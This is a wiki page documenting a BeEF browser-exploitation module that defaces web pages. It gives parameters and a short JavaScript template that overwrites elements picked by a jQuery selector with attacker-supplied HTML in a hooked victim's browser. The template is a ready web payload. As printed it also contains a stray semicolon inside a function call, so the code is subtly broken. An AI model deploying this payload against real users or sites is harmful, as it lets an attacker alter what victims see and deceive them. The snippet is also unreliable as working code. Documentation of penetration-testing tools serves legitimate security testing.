-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Replace Component (Deface)
Jess Williams edited this page Jan 13, 2020
·
2 revisions
-
Objective: Replace content of a specific component of the page
-
Authors: antisnatchor, xntrik
-
Browsers: All
-
Parameters:
- Target Selector: selector for the target element(s), in jQuery's selector notation.
- Deface Content: the HTML content to replace original content with
Replaces a selected component of the web page to the defaced content.
var result = $j('<%= @deface_selector %>').each(function() {
$j(this).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@deface_content) %>')););
}).length;
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK